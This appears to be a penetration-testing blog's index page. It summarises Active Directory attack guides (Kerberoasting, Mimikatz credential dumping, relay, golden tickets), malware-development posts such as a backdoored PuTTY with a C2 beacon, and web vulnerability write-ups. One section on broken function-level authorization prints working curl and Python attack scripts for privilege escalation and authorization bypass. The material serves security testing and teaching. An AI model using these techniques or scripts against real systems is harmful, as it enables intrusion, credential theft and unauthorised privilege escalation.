MrAzoth

Enumeration & Discovery — From Kali

Mon, 01 Jan 0001 00:00:00 +0000

Comprehensive Active Directory enumeration from a Kali/Linux attacker host: port scanning, DNS, LDAP, BloodHound, Kerbrute, NetExec, rpcclient, windapsearch, and more.

Enumeration & Discovery — From Windows

Mon, 01 Jan 0001 00:00:00 +0000

Quick Reference

Technique	Tool	Privilege Needed
Domain / forest info	Native AD cmdlets, PowerView	Domain user
User / group / computer enumeration	Get-ADUser, Get-DomainUser	Domain user
SPN discovery (Kerberoast candidates)	Get-ADUser, PowerView	Domain user
AdminSDHolder / privileged objects	Get-ADObject	Domain user
ACL enumeration	PowerView	Domain user
Local admin discovery	Find-LocalAdminAccess	Domain user
Share discovery	Find-DomainShare, Snaffler	Domain user
Full graph collection	SharpHound	Domain user
Host recon	Seatbelt	Local user (some checks need admin)
Session enumeration	SharpHound, NetSessionEnum	Local admin (remote hosts)
GPO enumeration	PowerView	Domain user
Trust mapping	Get-DomainTrust, nltest	Domain user

Native AD Cmdlets

No extra tooling required. Requires the ActiveDirectory PowerShell module, which is present on domain-joined systems with RSAT installed, or can be imported from a DC.

Kerberos Attacks — From Kali

Mon, 01 Jan 0001 00:00:00 +0000

Quick Reference

Attack	Tool	Hashcat Mode	Requirement
AS-REP Roasting	GetNPUsers.py / kerbrute	-m 18200	DONT_REQ_PREAUTH flag set
Kerberoasting	GetUserSPNs.py	-m 13100 (RC4) / -m 19700 (AES)	Valid domain user + SPN exists
Pass-the-Ticket	getTGT.py + impacket	N/A	Valid credentials or hash
Overpass-the-Hash	getTGT.py -aesKey	N/A	AES256 key for user
Kerbrute userenum	kerbrute	N/A	Network access to DC on port 88
Ticket conversion	ticket_converter.py	N/A	Existing .kirbi or .ccache

AS-REP Roasting

AS-REP Roasting targets accounts that have Kerberos pre-authentication disabled (DONT_REQ_PREAUTH flag set in userAccountControl). The KDC returns an AS-REP containing a portion encrypted with the user’s hash — no prior authentication required, making it requestable by anyone.

Kerberos Attacks — From Windows

Mon, 01 Jan 0001 00:00:00 +0000

Quick Reference

Attack	Tool	Prerequisite	Output
Kerberoasting	Rubeus, PowerView	Domain user, SPN exists	RC4/AES hash → offline crack
AS-REP Roasting	Rubeus	Domain user, pre-auth disabled on target	AS-REP hash → offline crack
Pass-the-Ticket	Rubeus, Mimikatz	Valid .kirbi or base64 ticket	Ticket injected into session
Overpass-the-Hash	Mimikatz, Rubeus	NTLM or AES hash	TGT obtained, ticket injected
Pass-the-Key	Mimikatz	AES256 hash	TGT obtained via AES pre-auth
Ticket Extraction	Rubeus, Mimikatz	Local admin (for other users’ tickets)	.kirbi files / base64 tickets
TGT Delegation	Rubeus tgtdeleg	Domain user, no local admin needed	Usable TGT
Ticket Harvesting	Rubeus harvest/monitor	Local admin	Ongoing TGT collection
Unconstrained Delegation Abuse	Rubeus monitor + coerce	Local admin on delegation host	Victim TGT captured

Hashcat Cracking Modes Reference

Mode	Hash Type	Attack Context
13100	Kerberoast — RC4 (TGS-REP)	Kerberoasting with /rc4opsec
19600	Kerberoast — AES128 (TGS-REP)	Kerberoasting with /aes
19700	Kerberoast — AES256 (TGS-REP)	Kerberoasting with /aes
18200	AS-REP — RC4 (krb5asrep)	AS-REP Roasting
17200	DPAPI masterkey	Seatbelt / Mimikatz DPAPI
1000	NTLM	Pass-the-Hash, secretsdump output
5600	NTLMv2 (Net-NTLMv2)	Responder / NTLM relay capture
7500	Kerberos 5 AS-REQ (etype 23)	Pre-auth brute force
3000	LM	Legacy — rarely seen

Kerberoasting

Kerberoasting requests Kerberos service tickets (TGS-REP) for accounts with a Service Principal Name (SPN) set. The ticket is encrypted with the service account’s password hash, enabling offline cracking.

Credential Attacks — From Windows

Mon, 01 Jan 0001 00:00:00 +0000

Quick Reference

Attack	Tool	Privilege Required
LSASS dump (live)	Mimikatz	LocalAdmin + SeDebugPrivilege
LSASS dump (ProcDump)	ProcDump / comsvcs.dll	LocalAdmin
DCSync	Mimikatz lsadump::dcsync	Domain Admin (or replication rights)
Local SAM	reg save + secretsdump	LocalAdmin
LSA Secrets	Mimikatz lsadump::lsa	SYSTEM
Cached domain creds	Mimikatz lsadump::cache	SYSTEM
GPP passwords	PowerSploit Get-GPPPassword	Domain User (SYSVOL read)
DPAPI triage	SharpDPAPI	LocalAdmin (backup key needs DA)
WDigest cleartext	Mimikatz sekurlsa::wdigest	LocalAdmin + WDigest enabled
Skeleton key	Mimikatz misc::skeleton	Domain Admin (DC access)
SSP injection	Mimikatz misc::memssp	SYSTEM on DC
Password spray	DomainPasswordSpray / Rubeus	Domain User
PPL bypass	mimidrv.sys kernel driver	SYSTEM + vulnerable driver

Mimikatz — Core Commands

Mimikatz is the primary credential extraction tool for Windows. Most operations require SeDebugPrivilege at minimum, and many require SYSTEM.

Credential Attacks & Relay — From Kali

Mon, 01 Jan 0001 00:00:00 +0000

Quick Reference

Technique	Tool	Prerequisite	Output
LLMNR/NBT-NS Poisoning	Responder	Network access, no SMB signing required	NTLMv1/v2 hashes
SMB Relay	ntlmrelayx.py	SMB signing disabled on target	SAM dump / shell
LDAP Relay	ntlmrelayx.py	LDAP on DC accessible	Computer accounts / RBCD
IPv6 Poisoning	mitm6 + ntlmrelayx	IPv6 not disabled on network	LDAP relay → DA
Coercion + Relay	PetitPotam / printerbug	Auth path to coerced machine	NTLM relay or TGT
DCSync	secretsdump.py	Domain Admin or replication rights	All NTLM hashes + AES keys
LSASS Dump	lsassy	Local admin on target	Plaintext / hashes
GPP Passwords	nxc -M gpp_password	Domain user	Cleartext credential
Password Spraying	nxc smb/ldap	Valid username list	Valid credentials

LLMNR/NBT-NS Poisoning with Responder

LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are fallback name resolution protocols used by Windows when DNS fails. When a host cannot resolve a name, it broadcasts an LLMNR/NBT-NS query to the local subnet. Responder answers these queries with the attacker’s IP, forcing the victim to authenticate — capturing NTLMv1 or NTLMv2 hashes.

Delegation Attacks — From Kali

Mon, 01 Jan 0001 00:00:00 +0000

Quick Reference

Attack	Tool	Required Privileges
Unconstrained Delegation Abuse	impacket, Responder, coercion tools	Compromise of delegated host
Constrained Delegation (KCD)	getST.py	Control of account with KCD configured
RBCD Setup + Abuse	addcomputer.py, rbcd.py, getST.py	GenericWrite or WriteDACL on target computer
Shadow Credentials	pywhisker.py, getnthash.py	WriteProperty on msDS-KeyCredentialLink
Coerce Authentication (PetitPotam)	PetitPotam.py	Valid domain credentials
Coerce Authentication (PrinterBug)	printerbug.py	Valid domain credentials

Delegation Overview

Kerberos delegation allows a service to impersonate users when accessing other services on their behalf. There are three types, each with different risk profiles and abuse paths.

Delegation Attacks — From Windows

Mon, 01 Jan 0001 00:00:00 +0000

Abusing Kerberos delegation (Unconstrained, Constrained, RBCD, Shadow Credentials) from a Windows foothold using Rubeus, PowerView, and PowerMad.

Lateral Movement — From Kali

Mon, 01 Jan 0001 00:00:00 +0000

Quick Reference

Technique	Tool	Auth Type	Notes
Pass-the-Hash	psexec.py, wmiexec.py, nxc	NTLM hash	No plaintext needed
Pass-the-Ticket	psexec.py -k, wmiexec.py -k	Kerberos ccache	Set KRB5CCNAME first
Evil-WinRM	evil-winrm	Password / Hash / Ticket	WinRM port 5985/5986
WMI Execution	wmiexec.py	Password / Hash	Output shown, less noisy
DCOM Execution	dcomexec.py	Password / Hash	Multiple COM objects
RDP PtH	xfreerdp /pth	NTLM hash	Requires Restricted Admin mode
SMB Exec	psexec.py, smbexec.py	Password / Hash	Different noise levels
Proxychains	proxychains + any tool	Any	Internal network pivoting

Pass-the-Hash (PtH) from Linux

Concept

NTLM authentication does not require knowledge of the plaintext password — it only requires the NT hash. The NT hash is the MD4 hash of the Unicode password, and it is used directly in the NTLM challenge-response exchange. A valid NT hash is sufficient to authenticate against any service using NTLM.

Lateral Movement — From Windows

Mon, 01 Jan 0001 00:00:00 +0000

Quick Reference

Technique	Tool	Requirement
Pass-the-Hash (PtH)	Mimikatz, Invoke-TheHash, PsExec	Local Admin / NTLM hash
Pass-the-Ticket (PtT)	Rubeus, Mimikatz	Valid Kerberos ticket (.kirbi / base64)
Overpass-the-Hash	Mimikatz, Rubeus	NTLM or AES256 hash
WMI Exec	PowerShell WMI, wmic, SharpWMI	Local Admin on target
DCOM Exec	PowerShell COM objects	Local Admin / DCOM permissions
PowerShell Remoting	Enter-PSSession, Invoke-Command	WinRM enabled, appropriate rights
PsExec	Sysinternals PsExec	Local Admin, ADMIN$ writable
Remote Service	sc.exe	Local Admin on target
Scheduled Task	schtasks.exe	Local Admin / valid credentials
Token Impersonation	Incognito, Invoke-TokenManipulation	SeImpersonatePrivilege
RDP	mstsc, tscon	RDP enabled, valid credentials or SYSTEM

Pass-the-Hash (PtH)

Pass-the-Hash abuses the NTLM authentication protocol by presenting a captured password hash directly instead of the cleartext password. The target authenticates the hash without needing the plaintext credential.

Domain & Forest Trusts — From Kali

Mon, 01 Jan 0001 00:00:00 +0000

Quick Reference

Attack	Requirement	Tool
Cross-domain Kerberoasting	Valid low-priv creds in child domain	GetUserSPNs.py
Cross-domain AS-REP Roasting	Valid low-priv creds in child domain	GetNPUsers.py
SID History Injection (parent-child)	Domain Admin in child domain, child krbtgt hash	ticketer.py
Cross-domain DCSync	Replication rights or DA in target domain	secretsdump.py
One-way inbound trust abuse	DA in trusted domain, inter-realm key	ticketer.py (silver), getST.py
One-way outbound trust abuse	DA in trusting domain, TDO GUID	secretsdump.py, getTGT.py
Cross-forest Kerberoasting	Bidirectional forest trust, valid creds	GetUserSPNs.py
Golden ticket cross-domain	Child krbtgt hash + parent domain SID	ticketer.py
BloodHound trust mapping	Valid creds, network access to DC	bloodhound-python

Trust Concepts

Trust Types

A Trust is a relationship between two domains that allows security principals in one domain to authenticate to resources in another. Trust information is stored in Active Directory as Trusted Domain Objects (TDOs) under CN=System.

Domain & Forest Trusts — From Windows

Mon, 01 Jan 0001 00:00:00 +0000

Enumerating and exploiting Active Directory domain and forest trusts from a Windows foothold: SID history injection, golden ticket cross-domain, inter-realm key abuse.

Persistence — From Kali

Mon, 01 Jan 0001 00:00:00 +0000

Quick Reference

Technique	Requirement	Detection Risk
DCSync	Domain Admin or explicit replication rights	High — replication request from non-DC
Golden Ticket	krbtgt NTLM + AES256 hash, domain SID	Medium — no TGT event (4768) on DC
Silver Ticket	Service account NTLM hash, domain SID, SPN	Low — no DC contact at all
Diamond Ticket	krbtgt AES256, valid user credentials	Low — based on a real TGT
NTDS.dit VSS	Shell on DC, local admin	High — shadow copy creation event
DPAPI Backup Key	Domain Admin, DC access	Medium — LDAP/RPC request to DC
ACL-based (DCSync rights)	WriteDACL or GenericAll on domain root	Low — ACL change may not alert
Machine Account creation	Any user with MachineAccountQuota > 0	Low
Pass-the-Hash persistence	Local admin hash, no domain rights needed	Low — appears as normal auth

DCSync

What It Is

DCSync abuses the Directory Replication Service (DRS) protocol. Domain controllers use DRS to replicate directory data between themselves. The GetNCChanges function is the core RPC call used. Any account with the following rights on the domain root object can invoke this:

Persistence — From Windows

Mon, 01 Jan 0001 00:00:00 +0000

Domain persistence techniques after AD compromise: Golden/Silver/Diamond Tickets, DCSync backdoors, AdminSDHolder, ACL abuse, WMI subscriptions, and DPAPI backup keys.

AD CS Attacks — From Kali

Mon, 01 Jan 0001 00:00:00 +0000

Active Directory Certificate Services exploitation from Kali: ESC1-ESC8, Certipy enumeration, certificate request abuse, NTLM relay to CA, and Pass-the-Certificate.

AD CS Attacks — From Windows

Mon, 01 Jan 0001 00:00:00 +0000

Active Directory Certificate Services exploitation from Windows: ESC1-ESC8 with Certify, ForgeCert, Rubeus, and Pass-the-Certificate.

Advanced Techniques — From Windows

Mon, 01 Jan 0001 00:00:00 +0000

Quick Reference

Technique	Tool	Requirement	Impact
KrbRelayUp (RBCD)	KrbRelayUp + Rubeus	Domain-joined, no LDAP signing	Low-priv → SYSTEM
gMSA password read	GMSAPasswordReader	Authorized principal	Lateral movement
LAPS password read	Get-AdmPwdPassword / PowerView	Read perm on ms-Mcs-AdmPwd	Local admin on target
PPL bypass (mimidrv)	Mimikatz + mimidrv.sys	Local admin	LSASS dump despite PPL
PPL bypass (PPLdump)	PPLdump	Local admin	LSASS dump despite PPL
LSASS dump (comsvcs)	LOLBAS / rundll32	Local admin	Credential extraction
WebDAV coercion trigger	PowerShell	Shell on target	Force HTTP auth for relay
Shadow credentials	Whisker	GenericWrite on account	PKINIT auth, NT hash

KrbRelayUp — Local Privilege Escalation to SYSTEM

What KrbRelayUp Is

KrbRelayUp abuses Resource-Based Constrained Delegation (RBCD) to escalate from a low-privilege domain user with a local shell to NT AUTHORITY\SYSTEM on the same machine. The attack creates a new machine account, configures RBCD on the target machine to trust that new account, then uses S4U2Self + S4U2Proxy to get a Kerberos service ticket impersonating Administrator (or any domain user) for the current machine — then uses that ticket to spawn a SYSTEM process.

Azure AD Hybrid Attacks — From Kali

Mon, 01 Jan 0001 00:00:00 +0000

Quick Reference

Attack	Requirement	Impact
MSOL Account DCSync	Local admin on AAD Connect server	Full domain + cloud compromise
AZUREADSSOACC$ Abuse	DCSync rights or DA	Forge Azure AD tokens
PHS Hash Extraction	MSOL DCSync rights	Cloud account takeover
PTA Abuse	On-prem DC compromise	Transparent cloud auth bypass
Golden SAML	ADFS signing cert theft	Persistent cloud access

Azure AD Connect Abuse (MSOL Account)

Azure AD Connect synchronizes on-premises Active Directory to Azure AD. During setup, it creates a service account named MSOL_xxxxxxxx in the on-premises domain. This account is granted DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain root — the exact permissions required for DCSync. Its password is stored encrypted in a SQL LocalDB instance on the AAD Connect server.

GPO Abuse — From Windows

Mon, 01 Jan 0001 00:00:00 +0000

Quick Reference

Technique	Tool	Requirement	Effect
Immediate Scheduled Task	SharpGPOAbuse	Write on GPO	Code exec as SYSTEM on all linked machines
Restricted Groups	SharpGPOAbuse	Write on GPO	Add attacker to local Admins
User Rights Assignment	SharpGPOAbuse	Write on GPO	Grant SeDebugPrivilege / SeImpersonatePrivilege
Manual XML task	PowerShell / SYSVOL write	Write on GPO or SYSVOL	Arbitrary command as SYSTEM
New GPO + Link	PowerView / RSAT	CreateGPO right + link permission	Full control over target OU
GPO Delegation read	PowerView / BloodHound	Any domain user	Map attack surface

GPO Fundamentals

Group Policy Objects (GPOs) are containers of policy settings applied to users and computers. They are linked to Organizational Units (OUs), Sites, or the Domain. When a machine or user logs in, the domain controller delivers applicable GPOs via SYSVOL (a shared folder replicated to all DCs). The machine then applies them every 90 minutes by default (± 30-minute random offset), or immediately on gpupdate /force.

Advanced Techniques — From Kali

Mon, 01 Jan 0001 00:00:00 +0000

Quick Reference

Technique	Tool	Requirement	Impact
WebDAV Coercion → LDAP relay	ntlmrelayx + PetitPotam	WebClient running on target	RBCD, shadow creds, DA
gMSA password read	gMSADumper / nxc	Authorized principal	Lateral movement
Zerologon	cve-2020-1472	Network access to DC (pre-patch)	Instant DA
noPac (CVE-2021-42278/42287)	noPac.py	Domain user	DA via KDC spoofing
LAPS read	nxc / ldapsearch	Read perm on ms-Mcs-AdmPwd	Local admin on target
LSASS dump (offline parse)	pypykatz	LSASS dump file	Credential extraction
KrbRelayUp pre-check	nxc ldap	Network access	Identify LDAP signing state

WebDAV Coercion — Bypass SMB Signing for NTLM Relay

Why WebDAV Coercion Works

Standard NTLM relay from SMB to LDAP is blocked when SMB signing is required (which is enforced on DCs by default). WebDAV coercion forces the target to authenticate over HTTP instead of SMB. HTTP authentication does not enforce signing, so it can be relayed to LDAP even when the target has SMB signing enabled.

A-Void — Burp Suite Data Sanitizer for LLM Collaboration

Tue, 07 Apr 2026 00:00:00 +0000

A Burp Suite extension that strips sensitive data from HTTP traffic so you can safely share requests and responses with AI assistants and LLMs — no credentials, no IPs, no names, no risk.

CVE-Hunter — Burp Suite CVE Lookup Extension

Tue, 07 Apr 2026 00:00:00 +0000

A Burp Suite extension that searches NVD, CVEDetails, and Snyk for known vulnerabilities given a technology and version — with PoC availability checks from nomi-sec/PoC-in-GitHub.

PPID Spoofing and Stomping — Process Injection Framework

Sat, 28 Mar 2026 00:00:00 +0000

Combining PPID Spoofing, Module Stomping, RC4 encryption, and native NT API enumeration into a single injection framework — built from scratch to understand how modern evasion techniques work under the hood.

A Kinder Russian Roulette — Encryption Practice

Thu, 12 Mar 2026 00:00:00 +0000

Six chambers, six encryption/obfuscation methods. A CTF-style tool for practicing Ghidra analysis and decryption routine writing — from XOR to AES-256 CBC to UUID obfuscation.

Backdooring PuTTY — PE Injection & C2 Beacon Delivery

Sun, 08 Mar 2026 00:00:00 +0000

Manual PE backdooring from scratch: code cave injection, new section addition, XOR evasion, and Adaptix C2 beacon delivery inside a legitimate PuTTY binary.

Walking the PE — Static Analyzer & PEB Walker

Fri, 06 Mar 2026 00:00:00 +0000

Deep dive into the Windows PE file format and runtime process inspection via PEB walking — parsing headers, import/export tables, and the loader module list.

GHOUL C2

Wed, 25 Feb 2026 00:00:00 +0000

Educational Discord-based Command & Control framework — AES-256-GCM encrypted beaconing, per-agent shell channels, and multiple evasion techniques implemented in C and Python.

HTTP Request Smuggling (H1): CL.TE / TE.CL / TE.TE

Tue, 24 Feb 2026 00:00:00 +0000

HTTP Request Smuggling (H1): CL.TE / TE.CL / TE.TE

Severity: Critical | CWE: CWE-444 OWASP: A05:2021 – Security Misconfiguration PortSwigger Research: https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn

What Is HTTP Request Smuggling?

Modern web architectures use a chain of HTTP processors: a frontend (CDN, load balancer, reverse proxy) that forwards requests to a backend server. These processors must agree on where each HTTP request ends and the next begins.

HTTP/1.1 allows two ways to specify body length:

Adobe Experience Manager (AEM)

Tue, 24 Feb 2026 00:00:00 +0000

Overview

Adobe Experience Manager (AEM) is an enterprise content management system widely used by Fortune 500 companies for managing digital marketing content, assets, and websites. It is built on Apache Sling, Apache Felix (OSGi), and uses a JCR (Java Content Repository) backend called Apache Jackrabbit CRX. From a security perspective, AEM is one of the richest targets in enterprise web application testing: default credentials, dozens of exposed servlets, Dispatcher bypass techniques, data extraction via QueryBuilder, and paths to RCE make it a recurring finding in red team engagements.

Apache Solr

Tue, 24 Feb 2026 00:00:00 +0000

Overview

Apache Solr is an open-source enterprise search platform built on Apache Lucene. It is commonly exposed internally and occasionally externally in corporate environments, cloud deployments, and data pipelines. Its rich HTTP API and Java internals make it a high-value target: unauthenticated admin panels, multiple deserialization vectors, SSRF handlers, and template injection have all led to full server compromise.

Default Ports:

Port	Service
8983	Solr HTTP API / Admin UI
9983	Solr inter-node communication (SolrCloud)
2181	ZooKeeper (embedded SolrCloud)

Recon and Fingerprinting

Service Detection

nmap -sV -p 8983,9983 TARGET_IP
nmap -sV -p 8983 --script http-title,http-headers TARGET_IP

Admin Panel Access

The Solr Admin UI is located at:

Apache ZooKeeper

Tue, 24 Feb 2026 00:00:00 +0000

Overview

Apache ZooKeeper is a distributed coordination service used by Hadoop, Kafka, Solr, HBase, and many other distributed systems. It stores configuration data, distributed locks, service registry information, and other coordination state in a hierarchical namespace called “znodes.” When exposed without authentication, ZooKeeper is a goldmine: credentials, internal topology, cluster configuration, and secrets are frequently stored in plaintext znodes.

Default Ports:

Port	Service
2181	ZooKeeper client port (primary)
2182	ZooKeeper TLS client port
2888	Peer-to-peer communication
3888	Leader election
8080	AdminServer HTTP API (ZK 3.5+)

Recon and Fingerprinting

Service Detection

nmap -sV -p 2181,2182,2888,3888,8080 TARGET_IP
nmap -sV -p 2181 --script zookeeper-info TARGET_IP

Four Letter Words (4LW Commands)

ZooKeeper supports short text commands sent directly over TCP. These are often accessible without authentication:

API Key Leakage

Tue, 24 Feb 2026 00:00:00 +0000

API Key Leakage

Severity: High–Critical | CWE: CWE-312, CWE-200, CWE-522 OWASP: A02:2021 – Cryptographic Failures | A09:2021 – Security Logging Failures

What Is API Key Leakage?

API keys, tokens, secrets, and credentials exposed through unintended channels — JavaScript bundles, git history, HTTP responses, mobile app binaries, environment variables in public CI logs, and configuration files. Unlike authentication token theft, API key leakage is passive: the credential is simply read from a public source.

Blind XSS: Detection, Delivery & Exfiltration

Tue, 24 Feb 2026 00:00:00 +0000

Severity: Critical (targets privileged users) CWE: CWE-79 | OWASP: A03:2021 Reference: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

Blind XSS is a subtype of stored XSS where the payload fires in a context you cannot directly observe: an admin panel, an internal log viewer, a support dashboard, a PDF report renderer, or an email client. You inject it and wait — when the privileged user loads the page, you receive a callback.

Broken Function Level Authorization (BFLA)

Tue, 24 Feb 2026 00:00:00 +0000

Broken Function Level Authorization (BFLA)

Severity: High–Critical | CWE: CWE-285, CWE-269 OWASP API Top 10: API5:2023 – Broken Function Level Authorization

What Is BFLA?

BFLA (Broken Function Level Authorization) occurs when users can access functions/endpoints they shouldn’t based on their role — e.g., a regular user calling admin APIs. Unlike BOLA (accessing another object), BFLA is about accessing privileged operations.

Regular user token → GET /api/users/me        → 200 OK (correct)
Regular user token → GET /api/admin/users     → should be 403
                  → but returns 200 with all users → BFLA

Or:
Regular user → DELETE /api/users/1337          → should be 403
             → returns 204 No Content          → BFLA

Discovery Checklist

Map all endpoints from JS, Swagger/OpenAPI, API docs, traffic
Identify admin/privileged endpoints: /admin, /internal, /manage, /staff
Test all “restricted” endpoints with low-privilege token
Test all HTTP methods on every endpoint (GET→POST→PUT→PATCH→DELETE)
Test API version downgrade (v2 protected, v1 not)
Test HTTP method override headers
Test path confusion (capitalization, trailing slash, double slash)
Test direct object manipulation to trigger privileged operations
Compare responses: authenticated admin vs authenticated user
Test GraphQL mutations with user token (see 83_GraphQL_Full.md)

Payload Library

Attack 1 — Admin Endpoint Access

# Test admin paths with regular user token:
ENDPOINTS=(
  "/admin/users"
  "/admin/settings"
  "/api/admin/dashboard"
  "/api/v1/admin/users"
  "/management/users"
  "/internal/config"
  "/staff/reports"
  "/superadmin"
  "/api/users?role=admin"   # role filter
  "/api/audit-log"
  "/api/system/health/debug"
)

for path in "${ENDPOINTS[@]}"; do
  status=$(curl -so /dev/null -w "%{http_code}" \
    "https://target.com$path" \
    -H "Authorization: Bearer REGULAR_USER_TOKEN")
  echo "$path: $status"
done

Attack 2 — HTTP Method Exploitation

# Server only protects specific methods:
# GET /api/users/1 → 403 (protected read)
# DELETE /api/users/1 → 204 (DELETE not protected)
# PUT /api/users/1 + body → 200 (PUT not checked)

for method in GET POST PUT PATCH DELETE HEAD OPTIONS TRACE; do
  result=$(curl -so /tmp/resp -w "%{http_code}" \
    -X "$method" "https://api.target.com/v1/admin/users" \
    -H "Authorization: Bearer USER_TOKEN" \
    -H "Content-Type: application/json" \
    -d '{"role":"admin"}')
  echo "$method: $result $(cat /tmp/resp | head -c 100)"
done

# HTTP method override (when firewall only allows GET/POST):
curl -X POST "https://api.target.com/v1/users/1" \
  -H "X-HTTP-Method-Override: DELETE" \
  -H "Authorization: Bearer USER_TOKEN"

curl -X POST "https://api.target.com/v1/users/1" \
  -H "X-Method-Override: PUT" \
  -H "Content-Type: application/json" \
  -d '{"role": "admin"}'

# _method parameter (Rails/Laravel):
curl -X POST "https://api.target.com/v1/users/1?_method=DELETE" \
  -H "Authorization: Bearer USER_TOKEN"

Attack 3 — Privilege Escalation via Function

# Escalate own privileges:
# Find: update user role function
curl -X PUT "https://api.target.com/v1/users/MY_ID" \
  -H "Authorization: Bearer MY_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"role": "admin", "permissions": ["*"]}'

# Create admin user (registration without role check):
curl -X POST "https://api.target.com/v1/users" \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"email":"attacker@evil.com","password":"pass","role":"admin","isAdmin":true}'

# Promote self via admin endpoint:
curl -X POST "https://api.target.com/v1/admin/users/MY_ID/promote" \
  -H "Authorization: Bearer USER_TOKEN"

# Assign group/team with admin privileges:
curl -X POST "https://api.target.com/v1/teams/ADMIN_TEAM/members" \
  -H "Authorization: Bearer USER_TOKEN" \
  -d '{"user_id": "MY_ID"}'

Attack 4 — Path Confusion Bypass

# Uppercase bypass (if authorization check is case-sensitive):
curl "https://api.target.com/Admin/users" \
  -H "Authorization: Bearer USER_TOKEN"
curl "https://api.target.com/ADMIN/users"
curl "https://api.target.com/aDmIn/users"

# Trailing slash / double slash:
curl "https://api.target.com/admin/users/"
curl "https://api.target.com//admin/users"
curl "https://api.target.com/api//admin/users"

# Path traversal to reach admin:
curl "https://api.target.com/api/users/../admin/users" \
  -H "Authorization: Bearer USER_TOKEN"
curl "https://api.target.com/api/v1/users/../../admin/users"

# URL encoding:
curl "https://api.target.com/%61dmin/users"     # a → %61
curl "https://api.target.com/adm%69n/users"    # i → %69
curl "https://api.target.com/%2fadmin%2fusers"  # encoded slashes

Attack 5 — API Version Downgrade

# v2 is protected but v1 is legacy and unprotected:
curl "https://api.target.com/v2/admin/users" \
  -H "Authorization: Bearer USER_TOKEN"   # → 403

curl "https://api.target.com/v1/admin/users" \
  -H "Authorization: Bearer USER_TOKEN"   # → 200?

# Test multiple version formats:
for v in v1 v2 v3 v0 beta alpha 1 2 3; do
  status=$(curl -so /dev/null -w "%{http_code}" \
    "https://api.target.com/$v/admin/users" \
    -H "Authorization: Bearer USER_TOKEN")
  echo "/$v/: $status"
done

# Accept-Version header:
curl "https://api.target.com/admin/users" \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Accept-Version: v1"

Tools

# AuthMatrix (Burp extension):
# Define roles, assign tokens, map endpoints
# Auto-test all combinations → shows unauthorized access

# Autorize (Burp extension):
# Replay every request with lower-privilege token
# Highlights responses that match → potential BFLA

# ffuf for endpoint discovery:
ffuf -u "https://target.com/FUZZ" \
  -H "Authorization: Bearer USER_TOKEN" \
  -w /usr/share/seclists/Discovery/Web-Content/api/api-seen-in-wild.txt \
  -mc 200,201,204 -o results.json

# Param Miner (Burp):
# Discover hidden parameters that control function access

# Manual script — test all methods × all endpoints:
python3 -c "
import requests, itertools

token = 'USER_TOKEN'
endpoints = ['/admin/users', '/admin/settings', '/api/export']
methods = ['GET', 'POST', 'PUT', 'PATCH', 'DELETE']
headers = {'Authorization': f'Bearer {token}', 'Content-Type': 'application/json'}

for ep, m in itertools.product(endpoints, methods):
    r = requests.request(m, f'https://target.com{ep}',
                         headers=headers, json={}, timeout=5)
    if r.status_code not in (403, 405):
        print(f'[!] {m} {ep} → {r.status_code}')
"

Remediation Reference

Centralized authorization layer: all function-level access decisions in one place (middleware/policy engine)
Default deny: every function access denied unless explicitly granted to role
Role-based access control (RBAC): define roles with explicit function permissions, check on every call
Do not rely on UI hiding: removing admin buttons from UI is not access control — enforce at API level
Audit all HTTP methods per endpoint — not just GET/POST
API version retirement: decommission old API versions; redirect with 410 Gone and enforce same auth controls until removal
Regular access control audits: use automated tools like AuthMatrix in CI/CD pipeline

Part of the Web Application Penetration Testing Methodology series.

Brute Force & Credential Stuffing

Tue, 24 Feb 2026 00:00:00 +0000

Brute Force & Credential Stuffing

Severity: High | CWE: CWE-307, CWE-521 OWASP: A07:2021 – Identification and Authentication Failures

What Is the Attack Class?

Credential stuffing: automated use of username/password pairs from previous data breaches against a target application — relies on password reuse.

Brute force: systematic testing of all possible passwords or a targeted wordlist against a known username.

Password spraying: test one or a few common passwords across many accounts — avoids per-account lockout while still achieving high success rates against weak password policies.

Business Logic Flaws

Tue, 24 Feb 2026 00:00:00 +0000

Business Logic Flaws

Severity: High–Critical | CWE: CWE-840, CWE-841 OWASP: A04:2021 – Insecure Design

What Are Business Logic Flaws?

Business logic flaws are vulnerabilities in the application’s intended workflow — not in code syntax or data handling, but in the rules governing what users can do, in what order, and under what conditions. They are rarely detected by scanners because they require understanding of how the application should work to recognize when it doesn’t.

Clickjacking

Tue, 24 Feb 2026 00:00:00 +0000

Clickjacking

Severity: Medium–High | CWE: CWE-1021 OWASP: A04:2021 – Insecure Design

What Is Clickjacking?

Clickjacking (UI redress attack) overlays an invisible <iframe> of the target site over a fake UI, tricking users into clicking target UI elements while believing they’re interacting with the attacker’s page.

Victim sees: "Click here to win a prize!" button
Reality:     Transparent iframe of target.com/delete-account is positioned
             so the victim clicks the "Confirm Delete" button instead

Impact escalation: clickjacking + CSRF → privileged actions; clickjacking + XSS → cookie theft; clickjacking drag-and-drop → text exfiltration.

Client-Side Template Injection (CSTI)

Tue, 24 Feb 2026 00:00:00 +0000

Client-Side Template Injection (CSTI)

Severity: High | CWE: CWE-79, CWE-94 OWASP: A03:2021 – Injection

What Is CSTI?

Client-Side Template Injection occurs when user input is interpolated directly into a client-side template engine (AngularJS, Vue.js, Handlebars, Mavo, etc.) without sanitization. Unlike XSS where you inject HTML/JS directly, CSTI injects template syntax that the framework itself evaluates — often bypassing XSS filters that sanitize HTML but not template delimiters.

AngularJS app renders: <div ng-app>Hello {{username}}</div>
Username = "{{7*7}}"
Rendered:  Hello 49  ← template evaluated → CSTI confirmed

Escalate:  username = "{{constructor.constructor('alert(1)')()}}"

CSTI is particularly powerful against apps that use AngularJS with ng-app on a wide DOM scope — because the AngularJS sandbox escape gives full JavaScript execution.

Cloud Storage Misconfigurations

Tue, 24 Feb 2026 00:00:00 +0000

Cloud Storage Misconfigurations

Severity: High–Critical | CWE: CWE-732, CWE-200 OWASP: A05:2021 – Security Misconfiguration

What Are Cloud Storage Misconfigs?

Cloud storage buckets (AWS S3, Google Cloud Storage, Azure Blob, DigitalOcean Spaces) default to private, but misconfigurations expose them publicly — allowing data read, write, or full takeover. Write access enables content injection, website defacement, or subdomain takeover.

Discovery Checklist

Enumerate bucket names from JS, HTML, API responses, SSL certs
Try predictable bucket names: company-backup, company-assets, company-files
Test s3://bucket-name for public listability (aws s3 ls)
